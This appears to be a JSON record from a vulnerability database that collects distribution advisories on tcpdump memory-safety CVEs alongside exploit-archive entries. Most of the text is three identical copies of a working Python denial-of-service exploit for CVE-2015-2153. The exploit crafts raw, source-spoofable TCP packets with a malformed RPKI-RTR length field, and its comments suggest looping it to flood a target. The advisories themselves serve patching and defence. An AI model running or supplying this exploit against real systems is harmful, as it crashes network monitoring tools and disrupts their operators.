A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code.\n\nIn the default installation, attackers would be isolated by the tcpdump AppArmor profile.", "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "USN-2580-1", "href": "https://usn.ubuntu.com/2580-1/", "title": "tcpdump vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "description": "### Background\n\ntcpdump is a Tool for network monitoring and data acquisition.\n\n### Description\n\nMultiple vulnerabilities have been discovered in tcpdump. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll tcpdump users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/tcpdump-4.7.4\"", "modified": "2015-10-31T00:00:00", "published": "2015-10-31T00:00:00", "id": "GLSA-201510-04", "href": "https://security.gentoo.org/glsa/201510-04", "type": "gentoo", "title": "tcpdump: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:22", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nInteger signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value. 
([CVE-2015-0261 __](<https://access.redhat.com/security/cve/CVE-2015-0261>))\n\nThe osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value. ([CVE-2015-2154 __](<https://access.redhat.com/security/cve/CVE-2015-2154>))\n\n \n**Affected Packages:** \n\n\ntcpdump\n\n \n**Issue Correction:** \nRun _yum update tcpdump_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686 \n tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686 \n \n src: \n tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.src \n \n x86_64: \n tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64 \n tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64 \n \n \n", "modified": "2015-07-07T22:25:00", "published": "2015-07-07T22:25:00", "id": "ALAS-2015-557", "href": "https://alas.aws.amazon.com/ALAS-2015-557.html", "title": "Medium: tcpdump", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:38", "bulletinFamily": "unix", "description": "- CVE-2014-8767 (denial of service)\n\nInteger underflow in the olsr_print function when in verbose mode,\nallows remote attackers to cause a denial of service (crash) via a\ncrafted length value in an OLSR frame.\n\n- CVE-2014-8768 (denial of service)\n\nMultiple Integer underflows in the geonet_print function, when in\nverbose mode, allow remote attackers to cause a denial of service\n(segmentation fault and crash) via a crafted length value in a Geonet frame.\n\n- CVE-2014-8769 (out-of-bounds memory read)\n\nMight allow remote attackers to obtain sensitive information from memory\nor cause a denial of service (packet loss or segmentation fault) via a\ncrafted Ad hoc On-Demand Distance Vector (AODV) 
packet, which triggers\nan out-of-bounds memory access.\n\n- CVE-2014-9140 (denial of service)\n\nBuffer overflow in the ppp_hdlc function in print-ppp.c allows remote\nattackers to cause a denial of service (crash) via a crafted PPP packet\nor possibly execute arbitrary code.\n\n- CVE-2015-0261 (out-of-bounds memory read)\n\nIPv6 mobility printer mobility_opt_print() typecasting/signedness error\nwould handle "len" as "int" (=positive and negative numbers), instead of\n"unsigned int" (=only positive numbers). When calling\nmobility_opt_print() with a negative "len", the "i < len" check would\nnot be satisfied and it would not enter the loop and try to read from bp[i].\n\n- CVE-2015-2153 (arbitrary code execution)\n\nTCP printer problem with missing length check in the\nrpki_rtr_pdu_print() function in print-rpki-rtr.c when processing\nRPKI-RTR PDUs (Protocol Data Units) with an incorrect header length.\nWithout this check, the function will try to operate on invalid data\nwhen processing certain packets, leading to all kinds of unwanted side\neffects, including crashes due to invalid reads, writes and general\nmemory corruption. Due to the memory corruption aspect it may lead to\ncode execution.\n\n- CVE-2015-2154 (out-of-bounds memory read)\n\nEthernet printer osi_print_cksum() missing sanity checks in\nprint-isoclns.c. The function may call the create_osi_cksum() function\nin checksum.c with invalid data leading to out-of-bounds memory read.\n\n- CVE-2015-2155 (arbitrary code execution)\n\nA flaw was found in tcpdump's force printer. 
A remote attacker could use\nthis flaw to cause tcpdump to crash, resulting in a denial of service,\nor possibly execute arbitrary code.", "modified": "2015-03-20T00:00:00", "published": "2015-03-20T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-March/000261.html", "id": "ASA-201503-20", "title": "tcpdump: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:37", "bulletinFamily": "exploit", "description": "", "modified": "2015-07-21T00:00:00", "published": "2015-07-21T00:00:00", "href": "https://packetstormsecurity.com/files/132762/tcpdump-rpki_rtr_pdu_print-Out-Of-Bounds-Denial-Of-Service.html", "id": "PACKETSTORM:132762", "type": "packetstorm", "title": "tcpdump rpki_rtr_pdu_print Out-Of-Bounds Denial Of Service", "sourceData": "`# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service \n# Date: 7.18.2015 \n# Exploit Author: Luke Arntson arntsonl@gmail.com \n# Vendor Homepage: http://www.tcpdump.org/ \n# Software Link: http://www.tcpdump.org/ \n# Version: 4.6.2, 4.5.1, 4.4.0 \n# Tested on: Lubuntu 14.04 64-bit \n# CVE : CVE-2015-2153 \n \n# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger. \n \nimport socket, sys \nfrom struct import * \n \ndef checksum(msg): \ns = 0 \nfor i in range(0, len(msg), 2): \nw = ord(msg[i]) + (ord(msg[i+1]) << 8 ) \ns = s + w \ns = (s>>16) + (s & 0xffff); \ns = s + (s >> 16); \ns = ~s & 0xffff \nreturn s \n \nif len(sys.argv) != 3: \nprint \"Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>\" \nexit() \n \n# fake the source and destination \nsource_ip = sys.argv[1] \ndest_ip = sys.argv[2] \n \ntry: \ns = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) \nexcept socket.error , msg: \nprint 'Socket could not be created. 
Error Code : ' + str(msg[0]) + ' Message ' + msg[1] \nsys.exit() \n \npacket = '' \n \n# ip header fields \nip_ihl = 5 \nip_ver = 4 \nip_tos = 0 \nip_tot_len = 0 # kernel will fill the correct total length \nip_id = 54321 #Id of this packet \nip_frag_off = 0 \nip_ttl = 255 \nip_proto = socket.IPPROTO_TCP \nip_check = 0 # kernel will fill the correct checksum \nip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to \nip_daddr = socket.inet_aton ( dest_ip ) \n \nip_ihl_ver = (ip_ver << 4) + ip_ihl \n \nip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr) \n \n# tcp header fields \ntcp_source = 255 # source port \ntcp_dest = 323 # destination port \ntcp_seq = 454 \ntcp_ack_seq = 0 \ntcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes \n#tcp flags \ntcp_fin = 0 \ntcp_syn = 1 \ntcp_rst = 0 \ntcp_psh = 0 \ntcp_ack = 0 \ntcp_urg = 0 \ntcp_window = socket.htons (5840) # maximum allowed window size \ntcp_check = 0 \ntcp_urg_ptr = 0 \n \ntcp_offset_res = (tcp_doff << 4) + 0 \ntcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5) \n \ntcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr) \n \n# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type. 
\n# The RPKI pdu looks like the following \n# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ] \n# by giving message length a long value, we cause the buffer to write into bad memory \nerror_pdu = '\\x41' # fake version \nerror_pdu = error_pdu + '\\x0A' # error type \nerror_pdu = error_pdu + '\\x00\\x01' # error number \nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x08' # must be less than or equal to total packet length \nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x00' # no encapsulated pdu \nerror_pdu = error_pdu + '\\x7F\\xFF\\xFF\\xFF' # overwrite out-of-bounds '\\0', causing DoS \nerror_pdu = error_pdu + 'AAAA' # fake message \n \nuser_data = error_pdu \n \n# pseudo header fields \nsource_address = socket.inet_aton( source_ip ) \ndest_address = socket.inet_aton(dest_ip) \nplaceholder = 0 \nprotocol = socket.IPPROTO_TCP \ntcp_length = len(tcp_header) + len(user_data) \n \npsh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length); \npsh = psh + tcp_header + user_data; \n \ntcp_check = checksum(psh) \n \n# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order \ntcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr) \n \n# final full packet - syn packets dont have any data \npacket = ip_header + tcp_header + user_data \n \n#Send the packet finally - the port specified has no effect \ns.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132762/tcpdumpoob-dos.txt"}], "zdt": [{"lastseen": "2018-01-03T05:01:10", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": 
"2015-07-21T00:00:00", "published": "2015-07-21T00:00:00", "id": "1337DAY-ID-23903", "href": "https://0day.today/exploit/description/23903", "type": "zdt", "title": "TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service Exploit", "sourceData": "# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service\r\n# Date: 7.18.2015\r\n# Exploit Author: Luke Arntson [email\u00a0protected]\r\n# Vendor Homepage: http://www.tcpdump.org/\r\n# Software Link: http://www.tcpdump.org/\r\n# Version: 4.6.2, 4.5.1, 4.4.0\r\n# Tested on: Lubuntu 14.04 64-bit\r\n# CVE : CVE-2015-2153\r\n \r\n# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger.\r\n \r\nimport socket, sys\r\nfrom struct import *\r\n \r\ndef checksum(msg):\r\n s = 0\r\n for i in range(0, len(msg), 2):\r\n w = ord(msg[i]) + (ord(msg[i+1]) << 8 )\r\n s = s + w\r\n s = (s>>16) + (s & 0xffff);\r\n s = s + (s >> 16);\r\n s = ~s & 0xffff\r\n return s\r\n \r\nif len(sys.argv) != 3:\r\n print \"Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>\"\r\n exit()\r\n \r\n# fake the source and destination\r\nsource_ip = sys.argv[1]\r\ndest_ip = sys.argv[2]\r\n \r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\r\nexcept socket.error , msg:\r\n print 'Socket could not be created. 
Error Code : ' + str(msg[0]) + ' Message ' + msg[1]\r\n sys.exit()\r\n \r\npacket = ''\r\n \r\n# ip header fields\r\nip_ihl = 5\r\nip_ver = 4\r\nip_tos = 0\r\nip_tot_len = 0 # kernel will fill the correct total length\r\nip_id = 54321 #Id of this packet\r\nip_frag_off = 0\r\nip_ttl = 255\r\nip_proto = socket.IPPROTO_TCP\r\nip_check = 0 # kernel will fill the correct checksum\r\nip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to\r\nip_daddr = socket.inet_aton ( dest_ip )\r\n \r\nip_ihl_ver = (ip_ver << 4) + ip_ihl\r\n \r\nip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)\r\n \r\n# tcp header fields\r\ntcp_source = 255 # source port\r\ntcp_dest = 323 # destination port\r\ntcp_seq = 454\r\ntcp_ack_seq = 0\r\ntcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes\r\n#tcp flags\r\ntcp_fin = 0\r\ntcp_syn = 1\r\ntcp_rst = 0\r\ntcp_psh = 0\r\ntcp_ack = 0\r\ntcp_urg = 0\r\ntcp_window = socket.htons (5840) # maximum allowed window size\r\ntcp_check = 0\r\ntcp_urg_ptr = 0\r\n \r\ntcp_offset_res = (tcp_doff << 4) + 0\r\ntcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)\r\n \r\ntcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)\r\n \r\n# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type.\r\n# The RPKI pdu looks like the following\r\n# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ]\r\n# by giving message length a long value, we cause the buffer to write into bad memory\r\nerror_pdu = '\\x41' # fake version\r\nerror_pdu = error_pdu + '\\x0A' # error type\r\nerror_pdu = error_pdu + '\\x00\\x01' # error number\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x08' # must be less than or equal to total 
packet length\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x00' # no encapsulated pdu\r\nerror_pdu = error_pdu + '\\x7F\\xFF\\xFF\\xFF' # overwrite out-of-bounds '\\0', causing DoS\r\nerror_pdu = error_pdu + 'AAAA' # fake message\r\n \r\nuser_data = error_pdu\r\n \r\n# pseudo header fields\r\nsource_address = socket.inet_aton( source_ip )\r\ndest_address = socket.inet_aton(dest_ip)\r\nplaceholder = 0\r\nprotocol = socket.IPPROTO_TCP\r\ntcp_length = len(tcp_header) + len(user_data)\r\n \r\npsh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);\r\npsh = psh + tcp_header + user_data;\r\n \r\ntcp_check = checksum(psh)\r\n \r\n# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order\r\ntcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)\r\n \r\n# final full packet - syn packets dont have any data\r\npacket = ip_header + tcp_header + user_data\r\n \r\n#Send the packet finally - the port specified has no effect\r\ns.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23903"}], "exploitdb": [{"lastseen": "2016-02-04T06:18:52", "bulletinFamily": "exploit", "description": "TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service. CVE-2015-2153. 
Dos exploit for linux platform", "modified": "2015-07-20T00:00:00", "published": "2015-07-20T00:00:00", "id": "EDB-ID:37663", "href": "https://www.exploit-db.com/exploits/37663/", "type": "exploitdb", "title": "TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service", "sourceData": "# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service\r\n# Date: 7.18.2015\r\n# Exploit Author: Luke Arntson arntsonl@gmail.com\r\n# Vendor Homepage: http://www.tcpdump.org/\r\n# Software Link: http://www.tcpdump.org/\r\n# Version: 4.6.2, 4.5.1, 4.4.0\r\n# Tested on: Lubuntu 14.04 64-bit\r\n# CVE : CVE-2015-2153\r\n \r\n# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger.\r\n \r\nimport socket, sys\r\nfrom struct import *\r\n \r\ndef checksum(msg):\r\n s = 0\r\n for i in range(0, len(msg), 2):\r\n w = ord(msg[i]) + (ord(msg[i+1]) << 8 )\r\n s = s + w\r\n s = (s>>16) + (s & 0xffff);\r\n s = s + (s >> 16);\r\n s = ~s & 0xffff\r\n return s\r\n\r\nif len(sys.argv) != 3:\r\n print \"Usage: ./CVE-2015-2153.py <source-ip> <destination-ip>\"\r\n exit()\r\n\r\n# fake the source and destination\r\nsource_ip = sys.argv[1]\r\ndest_ip = sys.argv[2]\r\n\t\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\r\nexcept socket.error , msg:\r\n print 'Socket could not be created. 
Error Code : ' + str(msg[0]) + ' Message ' + msg[1]\r\n sys.exit()\r\n \r\npacket = ''\r\n\r\n# ip header fields\r\nip_ihl = 5\r\nip_ver = 4\r\nip_tos = 0\r\nip_tot_len = 0 # kernel will fill the correct total length\r\nip_id = 54321 #Id of this packet\r\nip_frag_off = 0\r\nip_ttl = 255\r\nip_proto = socket.IPPROTO_TCP\r\nip_check = 0 # kernel will fill the correct checksum\r\nip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to\r\nip_daddr = socket.inet_aton ( dest_ip )\r\n \r\nip_ihl_ver = (ip_ver << 4) + ip_ihl\r\n \r\nip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)\r\n \r\n# tcp header fields\r\ntcp_source = 255 # source port\r\ntcp_dest = 323 # destination port\r\ntcp_seq = 454\r\ntcp_ack_seq = 0\r\ntcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes\r\n#tcp flags\r\ntcp_fin = 0\r\ntcp_syn = 1\r\ntcp_rst = 0\r\ntcp_psh = 0\r\ntcp_ack = 0\r\ntcp_urg = 0\r\ntcp_window = socket.htons (5840) # maximum allowed window size\r\ntcp_check = 0\r\ntcp_urg_ptr = 0\r\n \r\ntcp_offset_res = (tcp_doff << 4) + 0\r\ntcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)\r\n \r\ntcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)\r\n\r\n# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type.\r\n# The RPKI pdu looks like the following\r\n# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ]\r\n# by giving message length a long value, we cause the buffer to write into bad memory\r\nerror_pdu = '\\x41' # fake version\r\nerror_pdu = error_pdu + '\\x0A' # error type\r\nerror_pdu = error_pdu + '\\x00\\x01' # error number\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x08' # must be less than or equal to total 
packet length\r\nerror_pdu = error_pdu + '\\x00\\x00\\x00\\x00' # no encapsulated pdu\r\nerror_pdu = error_pdu + '\\x7F\\xFF\\xFF\\xFF' # overwrite out-of-bounds '\\0', causing DoS\r\nerror_pdu = error_pdu + 'AAAA' # fake message\r\n\r\nuser_data = error_pdu\r\n\r\n# pseudo header fields\r\nsource_address = socket.inet_aton( source_ip )\r\ndest_address = socket.inet_aton(dest_ip)\r\nplaceholder = 0\r\nprotocol = socket.IPPROTO_TCP\r\ntcp_length = len(tcp_header) + len(user_data)\r\n \r\npsh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);\r\npsh = psh + tcp_header + user_data;\r\n \r\ntcp_check = checksum(psh)\r\n\r\n# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order\r\ntcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)\r\n \r\n# final full packet - syn packets dont have any data\r\npacket = ip_header + tcp_header + user_data\r\n \r\n#Send the packet finally - the port specified has no effect\r\ns.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37663/"}], "oraclelinux": [{"lastseen": "2018-08-31T01:47:58", "bulletinFamily": "unix", "description": "[14:4.9.0-5]\r\n- Resolves: #1441597; use bigger capture buffer than in upstream\r\n \n[14:4.9.0-4]\r\n- Drop downstream patch (drop root privileges)\r\n- Add libcap-ng as a new build dependency\r\n- Related: #1262283\r\n \n[14:4.9.0-3]\r\n- Fix tests according to our patches and libpcap version\r\n \n[14:4.9.0-2]\r\n- Use getnameinfo instead of gethostbyaddr\r\n \n[14:4.9.0-1]\r\n- New upstream version 4.9.0. Resolves: #1422473\r\n- Add legacy -P switch with warning. 
Related to #1422473 and #1292056\r\n \n[14:4.5.1-6]\r\n- Drop root before creating any dump file. Resolves: #1262283\r\n \n[14:4.5.1-5]\r\n- Use -Q instead of -P to set capture direction. Resolves: #1292056\r\n \n[14:4.5.1-4]\r\n- Fix segfault with --help option. Resolves: #1297812", "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-1871", "href": "http://linux.oracle.com/errata/ELSA-2017-1871.html", "title": "tcpdump security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:42", "bulletinFamily": "unix", "description": "The tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.\n\nThe following packages have been upgraded to a later upstream version: tcpdump (4.9.0). (BZ#1422473)\n\nSecurity Fix(es):\n\n* Multiple out of bounds read and integer overflow vulnerabilities were found in tcpdump affecting the decoding of various protocols. An attacker could create a crafted pcap file or send specially crafted packets to the network segment where tcpdump is running in live capture mode (without -w) which could cause it to display incorrect data, crash or enter an infinite loop. 
(CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155, CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, CVE-2017-5486)\n\nRed Hat would like to thank the Tcpdump project for reporting CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, and CVE-2017-5486.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:32:19", "published": "2017-08-01T07:03:57", "id": "RHSA-2017:1871", "href": "https://access.redhat.com/errata/RHSA-2017:1871", "type": "redhat", "title": "(RHSA-2017:1871) Moderate: tcpdump security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:25:34", "bulletinFamily": "unix", "description": "**CentOS Errata and 
Security Advisory** CESA-2017:1871\n\n\nThe tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.\n\nThe following packages have been upgraded to a later upstream version: tcpdump (4.9.0). (BZ#1422473)\n\nSecurity Fix(es):\n\n* Multiple out of bounds read and integer overflow vulnerabilities were found in tcpdump affecting the decoding of various protocols. An attacker could create a crafted pcap file or send specially crafted packets to the network segment where tcpdump is running in live capture mode (without -w) which could cause it to display incorrect data, crash or enter an infinite loop. (CVE-2015-0261, CVE-2015-2153, CVE-2015-2154, CVE-2015-2155, CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, CVE-2017-5486)\n\nRed Hat would like to thank the Tcpdump project for reporting CVE-2016-7922, CVE-2016-7923, CVE-2016-7924, CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929, CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934, CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939, CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983, CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993, CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204, CVE-2017-5205, 
CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483, CVE-2017-5484, CVE-2017-5485, and CVE-2017-5486.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004570.html\n\n**Affected packages:**\ntcpdump\n\n**Upstream details at:**\n", "modified": "2017-08-24T01:41:48", "published": "2017-08-24T01:41:48", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004570.html", "id": "CESA-2017:1871", "title": "tcpdump security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}